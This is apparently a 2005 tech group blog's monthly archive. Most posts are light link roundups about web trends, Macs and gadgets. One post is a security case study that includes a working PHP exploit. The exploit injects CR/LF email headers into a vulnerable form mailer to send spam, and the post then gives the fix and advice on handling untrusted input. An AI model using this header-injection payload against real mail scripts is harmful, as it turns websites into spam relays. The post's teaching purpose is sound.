« November 2005 | Main | January 2006 »
December 29, 2005
Internet: The Great Equalizer
Recent Survey results from the Pew Internet & American Life Project reveal that the gap between number of male and female users of the Internet is closing. Young women (between 18 and 29) are actually more likely to web surf than males of the same age.
Surfing through other news stories that cover these results is also kind of fun.
Posted by Martin at 05:32 PM | Comments (1)
December 23, 2005
Video: Geek Stoplight
Subscribe in iTunes | Watch Quicktime
That's right folks... TechEvangelists is videoblogging! We aim to document and explore whatever tickles our tech-art fancy, including interviews with both under-the-radar tinkerers and your favorite Web 2.0 luminaries. For our debut video, we turned inward to our own Matt Gray (bio | blog). He bought an old stoplight on eBay and, out of sheer boredom, decided he wanted to control it with a computer. A party machine is born.
Matt promises to provide a step-by-step outline after the holidays, including schematics and the script controlling how the stoplight responds to music input.
Posted by colsen at 02:33 AM | Comments (1)
December 18, 2005
Web 2.0 Roundup
For my money, the biggest online developments this year were podcasting and vlogs. Anyone can create and distrubute media, globally, for free. Pretty big deal I'd say. iTunes support of podcasting and videoblogging was of course a huge boost to bringing media-casting to the mainstream. Does that qualify as Web 2.0? I don't think iTunes itself qualifies, but rich services such as Odeo and Mefeedia are innovative and user-driven - tasty Web 2.0 qualities.
Meanwhile...
Top Ten Web 2.0 Moments of 2005
Top 10 Innovative Web 2.0 Applications of 2005
The Best Web 2.0 Software of 2005
Five Reasons Why Web 2.0 Matters
Web 2.0? It doesn't exist
Web 2.0 Dead?
Is content king?
Posted by colsen at 04:16 AM | Comments (0)
December 16, 2005
10 for X
10 for X: Ten software titles for Mac OS X you must have
Some familiar apps here, but a few I've never heard of. I often end up using TextEdit to jot notes down when talking on the phone, or for ideas that (occasionally) pop into my head. Of course TextEdit offers no organization for notes, so I'm checking out Notational Velocity which automagically saves and indexes anything you write.
Posted by colsen at 12:03 PM | Comments (0)
December 14, 2005
Form Mailer SPAM: Exploit, Example.
Mailing a form's fields to e-mail address(es) is a common problem; unfortunately, deploying single-script solutions can often create a vulnerable webserver. Read on for a quick case study of a single PHP script that was hijacked to send SPAM.
Original Source
This particular vulnerable script was written to receive POSTs from a single web form, with a single field: "email".
1 <? 2 $email = $_POST['email']; 3 4 $message = "subscribe $email"; 5 $subject = ""; 6 $recipient = "somelist-request@mailman.example.com"; 7 8 if( preg_match( "/@/", $email ) ) 9 mail( $recipient, $subject, $message, "From: $email\r\n" ); 10 11 header( "Location: http://www.example.com/thanks/" ); 12 ?>
The script is simple enough: it retrieves a key from the browser's POST (line 2), builds a simple e-mail to the "somelist" mailman list subscription system, and sends it on its way.
Note that only validation performed (line 8) checks for the presence of
an '@' character.
Exploit
1 <?php
2
3 $site = 'www.example.com';
4 $url = '/sign-up/';
5
6 $exploit_text = "\r\n".
7 "bcc: youremail@example.com\r\n".
8 "Subject: This is SPAM.\r\n".
9 "From: "Spammer" <youremail@example.com>\r\n".
10 "\r\n".
11 "This mail script is utterly exploited.\r\n";
12
13 $req = 'email='.urlencode( stripslashes( $exploit_text ) );
14
15 $header = 'POST '.$url." HTTP/1.0\r\n";
16 $header .= "Host: $site\r\n";
17 $header .= "Content-Type: application/x-www-form-urlencoded\r\n";
18 $header .= "Content-Length: ".strlen( $req )."\r\n\r\n";
19
20 $fp = fsockopen( $site, 80, $errno, $errstr, 30 );
21
22 if ( ! $fp ) {
23 echo "ERROR: $errno, $errstr\n";
24 exit;
25 }
26
27 fputs( $fp, $header.$req );
28
29 while ( ! feof( $fp ) ) {
30 $results .= fgets( $fp, 1024 );
31 }
32
33 echo "\n\nResult: $results\n";
34
35 fclose( $fp );
36
37 echo "DONE\n";
38
39 ?>
This script is slightly more complex, but simple enough to demonstrate the flaw in the first code snippet. The code simply constructs a well-formed POST and sends it manually to www.example.com's web server on port 80.
Notice that the 'sploit text injects \r\n -- a carriage return / line feed, used in mail headers sent to sendmail to separate one header's line from the next. Why does this exploit the first script?
9 mail( $recipient, $subject, $message, "From: $email\r\n" );
The mail signature for PHP's mail( ) function is as follows:
bool mail ( string to, string subject, string message [, string
additional_headers [, string additional_parameters]] )
In this case, form data from the user ($_POST['email']) is concatenated
directly into the e-mail's final headers. If $email contains \r\n
sequences followed by more headers (as in $exploit_text) those headers
will be added to the real message!
In this case, I simply add a bcc: header line, a subject, from field,
and the spam email's text.
Solution
1 <?php 2 $email = $_POST['email']; 3 4 $email = preg_replace( "/[\r\n]/", '', $email ); 5 6 $message = "subscribe $email"; 7 $subject = ""; 8 $recipient = "somelist-request@mailman.example.com"; 9 10 if( preg_match( "/@/", $email ) ) 11 mail( $recipient, $subject, $message, "From: $email\r\n" ); 12 13 header( "Location: http://www.example.com/thanks/" ); 14 ?>
Line 4 solves the immediate problem; all carriage returns (\r) and
newlines (\n) are stripped from the untrusted user data before being
passed into the mail function's headers. This simple enhancement is
enough to prevent this particular exploit.
There are many other ways to improve the validation on this script, such as checking the e-mail address according to RFC 2822.
Defensive design
In order to mitigate these sorts of attacks, all form data should be
considered "tainted"—lacking rigorous validation, it should not be
inserted into an SQL statement, a mail command (especially the headers),
and CERTAINLY NOT in a exec( ) or system( ) command!
When data is tainted, anything derived from that data acquires the
taint. That is, one should be careful to trace the progress of
unvalidated user data all the way from the $_GET /
$_POST variables into whatever composite variables and arrays are made later.
The above appears obvious, but I assert that every programmer has written exploitable code. I hope that this concrete example will help some programmers write less exploitable code. Even "simple" code can be exploited by a knowledgeable attacker. Please keep this in mind the next time you deploy a band-aid script solution; never assume that your only source of form data is the actual web page's form.
Posted by Matt at 02:13 PM | Comments (0)
December 12, 2005
Web Development as acted out by toys
PingMag recently posted an article about The Web Development Process. It's pretty standard as far as process goes, but what's interesting are these cute illustrations.
[Via Matt.]
Posted by Martin at 11:39 AM | Comments (0)
December 07, 2005
Just Plain Cool
Check out this video of Xmas lights sequenced to music. It's freakin' cool.
Posted by colsen at 02:45 AM | Comments (0)
December 06, 2005
Good Question
How was Napoleon important to the development of the modern computer? That kind of question is typical of James Burke, host of the well-known Connections television series. You'll be able to find the answer to this and many other trails of connected thought on his forthcoming KnowledgeWeb project. Burke and his collaborators are creating a database with "almost infinite number of paths of exploration among people, places, things, and events." A smart web within the web.
Posted by colsen at 11:41 AM | Comments (0)
December 04, 2005
Apple's Swedish Connection
Ever wonder how Apple came up with the Command key symbol? Me neither, but here's the story. The Swedes use it to indicate an interesting feature or attraction. Over 20 years later, there's still a little Swedish campground in our shiny new Macs.
More computer history: The first video game
Posted by colsen at 12:56 AM | Comments (0)